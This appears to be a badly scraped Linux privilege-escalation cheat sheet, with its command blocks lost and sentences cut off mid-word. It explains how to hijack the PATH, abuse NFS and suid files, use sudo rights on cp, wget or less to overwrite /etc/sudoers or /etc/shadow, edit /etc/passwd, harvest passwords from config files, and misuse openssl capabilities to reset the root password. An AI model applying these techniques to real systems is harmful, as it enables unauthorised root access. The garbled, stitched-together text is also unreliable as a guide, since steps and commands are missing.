netstatand compare the results with the nmap scan from the outside to see if there are additional services available inside:
stringson them to see if they have interesting text inside.
$./scriptto run something. They do this by adding
lsin a folder that changes the root password when the
lscommand is executed there.
.in your PATH can also help the attacker if exploiting programs that make system(), execvp(), or execlp() calls to programs, if they do not specify the full path to the program the attacker can place a program into a directory in the PATH, so that program is run instead - this works because programmers just expect that the program they mean to run will be in the PATH.
.to your path:
/tmp/shareand look for interesting files. Test if you can create files, then check with your low-priv shell what user has created that file. If it says root has created the file, then you can create a file and set it with suid-permission from your attacking machine, then execute it with your low privilege shell.
sudoyou might be able to escalate your privileges with any program that can write or overwrite files. For example, if you have sudo rights to
cpyou can overwrite
/etc/sudoerswith your own malicious file.
wgetyou can use it in combination with python's SimpleHTTPServer to overwrite
/etc/shadowusing the following commands:
lessyou can go into vi, and then into a shell:
morewith a file that is bigger than your screen:
nmapwhich both need root permissions to open raw network sockets and create network packets. In general, this enhances security because you can grant root privileges to a single application isntead of a user account. However, SUID can be a serious security issue when that application is able to execute commands or edit files.
leafpad. Configuring these programs to execute as root would be a serious security vulnerability because any user could edit any file on the system.
/etc/passwdto change the root password.
/etc/directory. For example, the entry for root looks like this:
xmeans that the actual password is stored in
/etc/shadow/but you can replace the x with a crypt hash from the password and a salt
ctrl+xand hit Enter. Use the
sucommand to switch to the newly created user:
tomcat/s3cret) or password files for other users are stored in the users
wp-config.phprespectively. These configuration files include valuable information such as the MySQL username and password. Web administrators often re-use passwords for system accounts.
setcap, and query these using
+epmeans you’re adding the capability (“-” would remove it) as Effective and Permitted.
opensslhidden somewhere (a user's home folder, for example), you could use it to read any file you wanted, like this:
/etc/shadowto change the root password. Since we already have the original file, all we need to do is change the root password, and then abuse openssl's encrypt/decrypt functions.
/home/mydummyuser/shadow.custom, we first need to encrypt it (so we have what to decrypt):
su - root, et voilà!